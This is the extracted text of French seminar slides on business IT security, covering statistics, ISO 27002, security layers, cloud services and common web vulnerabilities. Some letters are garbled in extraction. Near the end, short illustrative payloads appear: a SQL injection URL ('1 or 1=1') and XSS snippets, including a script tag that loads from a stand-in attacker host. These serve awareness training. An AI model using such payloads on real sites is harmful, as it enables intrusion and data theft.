Parole d’expert
Philippe MONFILS - ComputerLand SLM
Bruno MAIRLOT - Maehdros
Une organisation conjointe avec Café Numérique
La sécurité IT - Une précaution vitale pour votre entreprise
Avec le soutien de :
� Début des années 2000, la cybercriminalité n’a pas cessé de se développer
� Le marché de la sécurité informatique est devenu l’un des secteurs les plus dynamiques de l’industrie IT
� les entreprises ont multiplié par trois la somme consacrée à la sécurité informatique en l’espace de six ans › Une société emploie désormais plus de 7 % de son
budget informatique dans la sécurité contre seulement 2 % en 2002.
› À l’heure actuelle, 55 % des entreprises ont une politique de sécurité documentée, contre 27 % en 2002
� Sur base d’une étude de Symantec, 70 % des entreprises en France ont été victimes d’une attaque informatique au cours des douze derniers mois
� 21 % des entreprises assurent constater une augmentation de la fréquence d’attaque, contre 29 % en 2010
� Cependant 92 % des entreprises estiment avoir subi des pertes à la suite à des attaques contre
100 % en 2009
� Une entreprise sécurisée préserve sa réputation
� Une sécurité garantie peut devenir un argument de vente
� Une sécurité inadaptée annule les avantages de la technologie
� Difficiles à quantifier !
� La sécurité des systèmes d’information ou SSI › l’ensemble des moyens techniques, organisationnels, juridiques et humains
nécessaires et mis en place pour conserver, rétablir, et garantir la sécurité du système d'information »
› Mise en place d’une politique de sécurité des systèmes d’information PSSI
� ISO/CEI 27002 › L’ISO/CEI 27002 (anciennement ISO 17799) décrit les règles de bonnes pratiques
� Risk assessment › L’évaluation du risque ou « risk assessment » doit être réalisée pour déterminer les
actions afin de réduire et de maintenir le risque à un niveau acceptable › Le risque n’est pas nécessairement lié à l’informatique. L’aspect social ou humain
est critique. › La gestion du risque consiste idéalement à :
� Choisir la méthode d’évaluation du risque adaptée à l’entreprise � Définir les critères d’identification des risques
› Les méthodologies les plus connues : MEHARI & OCTAVE
� La confidentialité : garantit que l’information est seulement accessible à ceux qui ont l’autorisation d’y accéder
� L’intégrité : représente la garantie que les données n’ont pas été modifiées, qu’elles sont complètes et précises
� La disponibilité : désigne la garantie du bon fonctionnement du système d'information
� L’authentification : S’assure que seules les personnes ayant le droit d’accéder aux informations puissent disposer des informations
� La non-répudiation : Elle permet de garantir qu'une transaction ne peut être niée ou contestée
� La couche physique › La gestion du courant, du refroidissement, des contrôles d’accès › Vidéosurveillance › Procédures en cas d’incendie ou d’inondation › La mise en place d’une solution de rechange en cas de perte totale
� La couche réseau › Configuration des routeurs, switches, Access Points WiFi, … › Détection et prévention des intrusions (IDS / IPS) › Firewall › Accès distants - VPN › Téléphonie IP › Service DNS › 802.1X, NAC / NAP
� La couche virtualisation › Règles de sécurité lors de la conception des machines virtuelles › Application d’un antimalware au niveau de la couche de virtualisation
� La couche OS et applications › Mise à jour des updates de l’OS › Mise à jour des applications › Antivirus › Firewall › HIDS › Antispam › Filtrage WEB
� La couche données › Les grands principes d’un DRP › De la mise en place d’un DRP › De citer les grandes techniques utilisées
� La couche utilisateurs › Politique de gestions des mots de passe › Authentification forte › Signature des documents › Signature et encryption des emails › Chiffrement des disques durs et lecteurs externes › Protection pour appareils mobiles › Charte des règles de bonne conduite
� La couche audit et management › Check-list d’évaluation › Test de pénétration en externe › Test de pénétration en interne › Surveillance de l’Active Directory › Inventaire du parc informatique › Collecte d’information (inventaire)
� Le Cloud Computing consiste à déporter des services, des stockages ou des traitements informatiques traditionnellement localisés sur des serveurs locaux sur des serveurs distants
� Avantages : › Haute disponibilité › Sécurité › Accessibilité › Évolutivité › Simplicité › Modèle locatif › Réduction et maitrise des coûts
� Catégorie 1 : Services Backup & DRP � Catégorie 2 : Web hosting � Catégorie 3 : Messagerie � Catégorie 4 : Infrastructure
Network – Firewall Network – Wireless
Applications – Antivirus Applications – Firewall
Applications –Antispyware
Applications - Anti spam OS – Mises à jour
Applications – Mise à jour
SILVER
Audit Audit de code + Audit de vulnérabilité + Audit de configuration
Evaluation des risques
GOLD
PLATINUM
Sécurité switches Sécurité routeurs Gestion 802.1X Gestion VPN
IWS – Web Filtrering Plan DRP
Encryption email Signature email Signature PDF
Mobile Security
Gestion salle serveur IDS / IPS
Sécurité switches Sécurité routeurs
Téléphonie Secure DNS
Deep Security Authentification forte
Chiffrement des disques Mobile Security
Règles virtualisation Authentification forte
Gestion 802.1X Infrastructure NAC / NAP
IWS – Web Filtering Intrusion Defense Firewall
DLP -> Data Loss Prevention Plan DRP
Signature PDF Gestion des mots de passe
Simple
Evaluation des risques Avancée
MAEHDROS Internet Services
Bruno Mairlot Gérant et fondateur de MAEHDROS Spécialiste en hos<ng et connec<vité
Sécurité des données et des systèmes hébergés
Twi6er: @bmairlot LinkedIn: brunomairlot
Défini@ons
• Un système est sécurisé lorsqu’il se comporte comme a@endu, à savoir : – Lorsqu’il est disponible – Lorsqu’il est intègre – Lorsque sa confiden@alité est garan@e
Objec@fs
• Les a6aquants peuvent être de plusieurs natures et u@liser différentes méthodes. Les buts recherchés peuvent être de deux types : – Financier – Notoriété et/ou idéalisme
Objec@fs financiers
• Le vol d’informa@on sensible (comptabilité, liste de client, brevets, codes informa@ques,…)
• Le vol d’informa@on directement financière comme les numéro de carte de crédit
Objec@fs notoriété / idées
• Volonté de nuire à un concurrent ou une société honnie (cf l’a6aque du Sony Playsta@on Network, près de 100 millions d’u@lisateur)
• A6aque des sites gouvernementaux (cf l’a6aque par Anonymous du site de la police espagnole)
• Volonté de montrer son savoir-‐faire
L’externalisa@on est-‐elle une solu@on ?
• En soi, l’externalisa@on n’est pas la solu@on, mais elle fait par@e des éléments à me6re en place pour une bonne défense car elle permet de : – restreindre le périmètre d’ac@on – Augmenter le rapport contraintes sur la sécurité/confort (par coercicion)
– Déléguer la tâche de protec@on des données sensibles
Les désavantages de l’externalisa@on
• En général, sur un réseau hébergé, la bande passante accessible aux infrastructures est sensiblement supérieure (parfois jusqu’à un facteur 1000) et permet donc d’a6aquer beaucoup plus rapidement.
• Cela peut toutefois être un avantage face à un a6aquant isolé
• Il y a des risques de dommages collatéraux (p. ex. une a6aque sur le cloud d’Amazon a6eindrait tous ses clients)
Cer@ficat SSL
• Les cer@ficats SSL sont conçus pour deux objec@fs : authen<fier le site que vous visitez et protéger vos données (notamment les données d’accès)
• Accessoirement un cer@ficat peut être u@lisé pour authen@fier le client
• Il est important de vérifier l’URL et l’éme6eur du cer@ficat.
Cer@ficat SSL
IPv6
• Dans le monde IPv6, tous les appareils seront connectés directement à Internet, sans passer par un Nat et parfois sans firewall (mobile)
• Il seront d’autant plus vulnérables s’ils ne sont pas à jour et protégés correctement
Vulnérabilités des sites web • Injec@on • Cross-‐Site Scrip@ng • Authen@fica@on et Session • Insecure Object Reference • Cross-‐Site Forged Request • Configura@on de la sécurité incorrecte • Stockage non sécurisé (credit card number,…) • Restric@on d’URL mal implémentée • Cryptographie mal u@lisée ou incomprise
Parades
• Mises à jour des applica@ons et des systèmes, protec@on contre la rétro-‐ingénierie
• Détec@on et préven@on d’intrusion • Educa@on et sensibilisa@on des u@lisateurs • Authen@fica@on et Autorisa@on • Protec@on par cryptographie (symétrique et/ou assymétrique)
Exemples : Injec@on
• Injec@on de code exécutable via les zones d’upload (via HTTP ou FTP) et ré-‐exécu@on de ces codes.
• Protec@on : U@liser des zones non couvertes par des URLs et accéder à ces URLs uniquement via des scripts sécurisés. – h6p://.../uploads/profil1000.jpg : Wrong – h6p://.../getUpload/?profilID=1000.jpg : Be6er
Exemples : Injec@on • URL basique :
– h6p://mon.site/viewProfil/?id=1 • L’a6aquant remplace ‘1’ => ‘1 or 1=1’ • URL forgée :
– h6p://mon.site/viewProfil/?id=1 or 1=1 • La query SQL est alors valide pour toutes les lignes de la
table. Il est alors possible d’accéder à n’importe quel profil • N’importe quel code SQL peut alors être injecté derrière ce
‘1=1’ • Protec@on : Valider et Vérifier les URLs et les paramètres
de manière systéma<que
Exemples : XSS
• Généralement les injec@ons amènent à produire des scripts Javascript pour effectuer toute une série de commande via d’autres sites.
• <script src=‘h6p://hackersite.ru/[email protected]’></script>
• <body onload=‘alert() ’> • <img onerror=‘…’>
Recommanda@ons globales • Installa@on d’une passerelle filtrante en amont des serveurs
• Détec@on d’un (trop) grand nombre de requêtes/session TCP d’un même host
• Verrouillage read-‐only des codes • U@lisa@on de méthodes sécurisées pour le déploiement des nouveaux codes et nouvelles version
• Eviter les hébergements mutualisés (car manque de contrôle)
Merci pour votre a6en@on.
Recommended
